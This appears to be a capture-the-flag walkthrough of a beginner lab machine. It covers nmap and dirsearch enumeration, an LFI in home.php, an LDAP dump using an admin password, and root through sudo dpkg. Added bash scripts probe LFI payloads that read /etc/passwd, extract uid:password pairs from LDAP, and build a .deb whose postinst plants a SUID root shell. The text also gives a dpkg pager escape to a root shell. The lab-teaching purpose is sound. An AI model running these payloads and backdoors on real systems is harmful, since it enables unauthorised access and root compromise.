A beginner, real-life-based machine designed to teach people the importance of understanding from the interior.
Start by running nmap with service detection against the full port range (the highest TCP port is 65535, so anything less leaves a gap at the top):
nmap -sV -p0-65535 192.168.78.134
reveals the following ports:
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl?
So we have SSH, HTTP and LDAP (plain on 389, TLS on 636). Note that the banners disagree: OpenSSH reports Debian 10 while Apache reports Ubuntu, so treat version strings as hints rather than facts. There are no usernames to brute-force yet, so let's start with HTTP.
Start brute-forcing for files and directories with dirsearch (-f forces the .php extension onto every wordlist entry):
python3 dirsearch.py -u http://192.168.78.134 -e php -w /usr/share/seclists/Discovery/Web-Content/big.txt -f
Nothing special in portraits.php. You can check the images for EXIF metadata, but you'll find nothing interesting:
The admin.php login sends the username and password in a GET request, which puts credentials into the URL, the server's access log and the browser history, so this might be a good point to start. You may try SQL injection on the username and password parameters with sqlmap, but neither appears to be vulnerable:
There is something more interesting in home.php though. Have a look at this:
Could this be a Local File Inclusion? Ironhackers has a good cheat sheet: https://ironhackers.es/herramientas/lfi-cheat-sheet/ After checking a whole bunch of payloads I found the injection with
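A small probe script for the step above, as an added example that is not part of the original write-up. It sends a handful of the cheat sheet's traversal and wrapper payloads and classifies each response. The page does not show which home.php parameter is the vulnerable one, so the URL and the parameter name are arguments you supply; the payload list and the /etc/passwd marker are my choices.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): probe a suspected LFI
# parameter with a short payload list and classify each response.
# URL and parameter name come from the command line; no default parameter
# is assumed because the page does not name it.
set -u

# A small subset of the traversal and wrapper payloads the Ironhackers
# cheat sheet covers: plain traversal, nested traversal that survives a
# naive "../" strip, a null byte (old PHP only) and the php://filter
# wrapper, which returns the file base64-encoded so it is not executed.
lfi_payloads() {
  cat <<'EOF'
/etc/passwd
../../../../etc/passwd
../../../../../../../../etc/passwd
....//....//....//....//etc/passwd
/etc/passwd%00
php://filter/convert.base64-encode/resource=/etc/passwd
EOF
}

# Classify a response body: "plain" if it contains /etc/passwd verbatim,
# "base64" if a base64 run inside it decodes to /etc/passwd (the
# php://filter case), "miss" otherwise. Always exits 0; the word is the result.
classify_body() {
  body=$1
  if printf '%s' "$body" | grep -q 'root:x:0:0:'; then
    echo plain
    return 0
  fi
  for tok in $(printf '%s' "$body" | grep -o '[A-Za-z0-9+/=]\{40,\}'); do
    decoded=$(printf '%s' "$tok" | base64 -d 2>/dev/null || true)
    if printf '%s' "$decoded" | grep -q 'root:x:0:0:'; then
      echo base64
      return 0
    fi
  done
  echo miss
  return 0
}

# Send each payload unencoded (so %00 and php:// reach PHP as written) and
# print the classification next to the payload.
run_scan() {
  url=$1
  param=$2
  lfi_payloads | while IFS= read -r p; do
    body=$(curl -s "$url?$param=$p")
    printf '%-7s %s\n' "$(classify_body "$body")" "$p"
  done
}

if [ "$#" -ge 2 ]; then
  run_scan "$1" "$2"
fi
```

Run it as `./lfi_probe.sh http://192.168.78.134/home.php <parameter>`. The php://filter payload is the one worth keeping: it returns PHP source (admin.php, home.php) base64-encoded instead of executing it, which is how you read the application's own code through the include.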
One of the two new things I learned from this machine: always enumerate LDAP if you have a username:
nmap -sV -p389,636 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local",ldap.password="qMDdyZh3cT6eeAWD"' 192.168.78.134
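The same authenticated dump with ldapsearch instead of the nmap script, as an added example that is not from the original write-up. The bind DN and password are the ones shown above; everything else (the base DN, the output parsing, the sample LDIF) is my own. ldapsearch writes attribute values that are not plain printable text, which includes most userPassword values, with a double colon and base64, so the parser decodes those before printing.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): dump the directory with
# ldapsearch and pull uid/userPassword pairs out of the LDIF.
set -u

HOST=192.168.78.134
BIND_DN='cn=admin,dc=symfonos,dc=local'   # credentials from the write-up
BIND_PW='qMDdyZh3cT6eeAWD'
BASE='dc=symfonos,dc=local'               # assumed base DN (suffix of the bind DN)

# Authenticated dump of the whole tree. ldif-wrap=no stops ldapsearch from
# folding long values onto continuation lines, which keeps parsing simple.
ldap_dump() {
  ldapsearch -x -H "ldap://$HOST" -D "$BIND_DN" -w "$BIND_PW" \
    -b "$BASE" -o ldif-wrap=no '(objectClass=*)'
}

# Read LDIF on stdin and print "uid:password" for every entry that has both.
# "attr:: value" means base64 in LDIF; "attr: value" is literal.
ldif_creds() {
  uid=''
  pw=''
  while IFS= read -r line; do
    case $line in
      'uid: '*)           uid=${line#uid: } ;;
      'userPassword:: '*) pw=$(printf '%s' "${line#userPassword:: }" | base64 -d) ;;
      'userPassword: '*)  pw=${line#userPassword: } ;;
      '')                 # blank line ends an entry
        if [ -n "$uid" ] && [ -n "$pw" ]; then printf '%s:%s\n' "$uid" "$pw"; fi
        uid=''
        pw='' ;;
    esac
  done
  # flush the last entry if the stream did not end with a blank line
  if [ -n "$uid" ] && [ -n "$pw" ]; then printf '%s:%s\n' "$uid" "$pw"; fi
}

if [ "${1:-}" = dump ]; then
  ldap_dump | ldif_creds
fi
```

Run `./ldap_creds.sh dump` from the attacking box (needs ldap-utils). Decoded userPassword values are either clear text or a hash with a scheme prefix such as {SSHA}; only the former logs you straight in over SSH.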
Now you can log in via SSH as the god of thunder (zeus). Standard enumeration (sudo -l) shows that zeus can run dpkg as root via sudo:
I found a tutorial on privilege escalation with dpkg. You may not speak Indonesian, but it's easy to understand. You build a Debian package using fpm and put a backdoor script inside the .deb as a maintainer script. Get it onto the machine and "install" it using your sudo privilege: dpkg runs the maintainer script as root during installation, so the script does whatever you want as root.
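The package build spelled out, as an added example rather than the tutorial the write-up links to. It uses dpkg-deb, which is on any Debian-based attacking box, and notes the fpm equivalent; the package name, the payload (a SUID copy of bash in /tmp) and all paths are my choices.

```bash
#!/usr/bin/env bash
# Added example (not the write-up's tutorial): build a .deb whose postinst
# maintainer script runs as root when the package is installed with
# "sudo dpkg -i". Package name, payload and paths are arbitrary choices.
set -u

PKG=privesc
VER=1.0

# Lay out the package tree. DEBIAN/postinst is what dpkg executes as root
# after unpacking; DEBIAN/control is the minimum metadata dpkg-deb accepts.
# Prints the path of the postinst script.
write_package_tree() {
  root=$1
  mkdir -p "$root/DEBIAN"
  cat > "$root/DEBIAN/control" <<EOF
Package: $PKG
Version: $VER
Architecture: all
Maintainer: nobody <nobody@localhost>
Description: dpkg sudo privilege escalation demo
EOF
  # Payload: leave a SUID copy of bash behind. Run it with "-p" afterwards
  # so bash keeps the effective uid 0 instead of dropping it.
  cat > "$root/DEBIAN/postinst" <<'EOF'
#!/bin/sh
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash
EOF
  chmod 0755 "$root/DEBIAN/postinst"   # dpkg refuses non-executable maintainer scripts
  echo "$root/DEBIAN/postinst"
}

# Build the archive with dpkg-deb. The fpm equivalent, with the payload in
# a standalone file and an empty directory as package content, is:
#   fpm -n "$PKG" -v "$VER" -s dir -t deb -a all --after-install payload.sh ./emptydir
build_deb() {
  tree=$1
  out=$2
  dpkg-deb --build "$tree" "$out" >/dev/null
  echo "$out"
}

if [ "${1:-}" = build ]; then
  tree=$(mktemp -d)
  write_package_tree "$tree" >/dev/null
  build_deb "$tree" "./${PKG}_${VER}_all.deb"
fi
```

Build with `./mkdeb.sh build`, copy the .deb to the target (scp works, since you already have SSH as zeus), then `sudo dpkg -i privesc_1.0_all.deb` followed by `/tmp/rootbash -p`. The install itself can fail or complain about dependencies after postinst has already run; the SUID shell is left behind either way. A well-known shortcut not used on this page: `sudo dpkg -l` opens a pager, and `!/bin/sh` from inside less gives the same root shell without building anything.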